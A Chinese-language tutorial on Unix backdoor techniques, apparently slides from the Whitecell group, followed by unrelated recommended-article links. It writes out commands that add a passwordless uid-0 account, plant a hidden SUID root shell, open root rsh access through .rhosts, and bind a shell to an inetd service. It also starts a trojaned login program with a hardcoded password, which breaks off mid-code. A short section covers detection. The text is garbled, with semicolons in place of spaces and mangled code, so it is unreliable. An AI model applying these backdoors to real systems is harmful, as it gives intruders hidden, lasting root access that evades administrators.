作者：艾奇?zhèn)?
Mail：e4gle@whitecell.org;
Page：http://www.whitecell.org;
Copyright:;Whitecell;Security;Systems;

概述;

后門簡介;
常用后門技術;
后門的檢測;
實例講解：login后門;

后門簡介;

入侵者完全控制系統(tǒng)后 ， 為方便下次進入而采用的一種技術 。;
一般通過修改系統(tǒng)配置文件和安裝第三方后門工具來實現(xiàn) 。;
具有隱蔽性 ， 能繞開系統(tǒng)日志 ， 不易被系管理員發(fā)現(xiàn)等特點 。;

常用后門技術;

增加超級用戶賬號;
破解/嗅探用戶密碼;
放置SUID;Shell;
rhosts; ; ;
利用系統(tǒng)服務程序;
TCP/UDP/ICMP;Shell;
Crontab定時任務;
共享庫文件;
工具包rootkit;
可裝載內核模塊(LKM);

增加超級用戶;

#;echo;"e4gle:x:0:0::/:/bin/sh";>>
/etc/passwd;
#;echo;"e4gle::-1:-1:-1:-1:-1:-1:500";>>
/etc/shadow;
如果系統(tǒng)不允許uid=0的用戶遠程登錄 ， ;
還需要增加一個普通用戶賬號 。;

破解/嗅探用戶密碼;

獲得shadow文件后 ， 用John;the;Ripper;
工具破解薄弱的用戶密碼 。;
安裝sniffit等嗅探工具 ， 監(jiān)聽telnet、ftp等;
端口 ， 收集用戶密碼 。;

放置SUID;Shell;

#;cp;/bin/bash;/dev/.rootshell;
#;chmod;u s;/dev/.rootshell;
普通用戶在本機運行/dev/.rootshell ， 即;
可獲得一個root權限的shell 。;

rhosts; ; ;

#;echo;" ; ";>;/.rhosts;
#;rsh;-l;root;victim.com;csh;-i;
遠程可以得到一個rootshell 。;

利用系統(tǒng)服務程序;

修改/etc/inetd.conf ， ;
daytime;stream;tcp;nowait;/bin/sh;sh;-I;
用trojan程序替換in.telnetd、in.rexecd等;
inted的服務程序;
重定向login程序;

TCP/UDP/ICMP;Shell;

BindShell ， 大部分是基于TCP/UDP協(xié)議;
的網(wǎng)絡服務程序 ， 在高端口監(jiān)聽 ， 很容易;
被發(fā)現(xiàn) 。;
Ping;Backdoor ， 通過ICMP包激活后門 ， ;
形成一個Shell通道 。;
TCP;ACK數(shù)據(jù)包后門 ， 能夠穿越防火;
墻 。;

Crontab定時任務;

通過Crontab程序調度已安裝的后門程序;
定時運行 ， 一般在深夜時段 ， 是系統(tǒng)管理;
員不在線的時間 。;

共享庫文件;

在共享庫中嵌入后門函數(shù);
使用后門口令激活Shell ， 獲得權限;
能夠躲避系統(tǒng)管理員對二進制文件本身的;
校驗;

工具包rootkit;

包含一系列系統(tǒng)及后門工具：;
-;清除日志中的登錄記錄;
-;偽裝校驗和;
-;替換netstat、ps等網(wǎng)絡工具;
-;后門登錄程序;
易于安裝和使用;

可裝載內核模塊(LKM);

LKM：Loadable;Kernel;Modules;
動態(tài)的加載 ， 不需要重新編譯內核 。;
截獲系統(tǒng)調用 ， 具有隱藏目錄、文件、進;
程、網(wǎng)絡連接等強大功能 。;
自身隱蔽性好 ， 發(fā)現(xiàn)難度較大 。;
著名的LKM包有adore和knark 。;

后門的檢測;

以自己的經(jīng)驗 ， 結合特定的工具 ， 手工作;
一些檢測 。;
使用Tripwire或md5校驗來檢查系統(tǒng) 。;
借助IDS系統(tǒng) ， 監(jiān)聽到目標機器的可疑網(wǎng);
絡連接 。;

實例：login后門;

入侵者先把原始的/bin/login備份 ， 再用一;
段程序替換/bin/login 。入侵者telnet登錄;
進來的時候 ， 通過環(huán)境變量或者終端類型;
傳遞了正確的后門密碼 ， 將直接獲得一個;
Shell；如果是普通用戶登錄 ， 將會重定;
向到原始的login文件 ， 來處理正常的登;
錄 。;
最簡單的login后門ulogin.c源代碼如下：;

實例：login后門;

#include;#define;PASSWORD;"passWORD";
#define;_PATH_LOGIN;"/sbin/logins";

main;(argc,;argv,;envp);
int;argc
char;**argv,;**envp
{;
char;*display;=;getenv("DISPLAY")
if;(;display;==;NULL;);{;
execve(_PATH_LOGIN,;argv,;envp)

推薦閱讀

• 

  工種 廣東職業(yè)技能提升各職業(yè)及專項職業(yè)能力補貼(指導)標準
• 

  醫(yī)護人員的簡筆畫步驟醫(yī)護人員的簡筆畫畫法
• 

  廁所里有紅色細長的蟲子怎么解決
• 

  兒童自行車尺寸怎么看 兒童自行車尺寸看哪里
• 

  家鄉(xiāng)美名言警句霸氣的
• 

  巧用搜狗輸入法拆分輸入生僻字
• 

  spf50pa+++是什么意思
• 

  蒂亞怎么養(yǎng)
• 

  關于自學考試需要多久才能拿證
• 

  護腚毛有什么作用
• 

  巡航調節(jié)系統(tǒng)的工作原理是什麼
• 

  前置攝像頭打不開
• 

  武尊神甲怎么做,仙峰《烈焰武尊》新版本前瞻
• 

  我來教你steam出現(xiàn)錯誤代碼118的原因及解決方法 我來教你吧
• 

  早上發(fā)朋友圈的句子 早上發(fā)朋友圈的句子簡短
• 

  山海關房價會漲嗎,山海關區(qū)可以投資嗎

• 快速建立linux下的vpn服務器做加密代理
• Linux下防范緩沖區(qū)溢出攻擊的系統(tǒng)安全策略
• 圖 Mandrake Linux 9.0 beta + Vmware 安裝
• 圖 Linux下SSH密匙完美使用方法
• 實現(xiàn)Linux操作系統(tǒng)的自動登錄
• Linux操作系統(tǒng)十大高級安全管理技巧
• 圖 Linux操作系統(tǒng)打印機配置全攻略
• 圖 Linux網(wǎng)絡環(huán)境下如何玩轉GMail信箱
• 圖 打造完美linux系統(tǒng)：網(wǎng)絡軟件安裝一
• 圖 打造完美linux系統(tǒng)：網(wǎng)絡軟件安裝二